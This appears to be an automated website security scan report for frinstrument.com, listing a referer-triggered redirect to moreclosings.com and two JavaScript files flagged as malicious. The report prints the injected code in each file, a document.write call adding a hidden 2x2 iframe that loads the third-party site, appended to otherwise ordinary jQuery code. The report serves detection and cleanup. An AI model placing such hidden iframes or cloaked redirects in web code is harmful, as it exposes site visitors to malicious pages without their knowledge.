Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://frinstrument.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: frinstrument.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 31 Aug 2014 12:17:04 GMT Location: http://moreclosings.com/showthread.php?sid=128332 Server: Apache Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://frinstrument.com/ | 200 OK Content-Length: 13990 Content-Type: text/html | clean |
http://frinstrument.com/docs/assets/jquery.js | 200 OK Content-Length: 54075 Content-Type: application/javascript | clean |
http://frinstrument.com/docs/javascripts/jquery.boxy.js | 200 OK Content-Length: 20768 Content-Type: application/javascript | clean |
http://frinstrument.com/common/ChkText.js | 200 OK Content-Length: 16979 Content-Type: application/javascript | clean |
http://frinstrument.com/ORDER_JS.js | 200 OK Content-Length: 4729 Content-Type: application/javascript | clean |
http://frinstrument.com/js/l10n.js?ver=20101110 | 200 OK Content-Length: 473 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=128332 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332> | ||
http://frinstrument.com/js/custom.js?ver=3.2.1 | 200 OK Content-Length: 15392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(function($){ $(document).ready(function(){ $('ul.sf-menu').supersubs({ minWidth: 16, maxWidth: 40, extraWidth: 1 }) .superfish(); $('.tooltip').tipsy({fade: false, gravity: 's'}); $('#portfolio-cats a').hover(function(){ $(this).stop().animate({marginTop: '-2px'}, 300); } ,function(){ $(this).stop().animate({marginTop: '0px'}, 300); }); $('#staff-cats a').hover(function() var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=128332 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332> | ||
http://frinstrument.com/js/jquery.easing.1.3.js?ver=3.2.1 | 404 Not Found Content-Length: 406 Content-Type: text/html | clean |
http://frinstrument.com/test404page.js | 404 Not Found Content-Length: 397 Content-Type: text/html | clean |
http://frinstrument.com/js/jquery.elegantcarousel.min.js?ver=3.2.1 | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://frinstrument.com/js/jquery.nivo.slider.js?ver=3.2.1 | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://frinstrument.com/js/jquerytoggle.js | 403 Forbidden Content-Length: 405 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frinstrument.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frinstrument.com/
Result: frinstrument.com is not infected or malware details are not published yet.
Result: frinstrument.com is not infected or malware details are not published yet.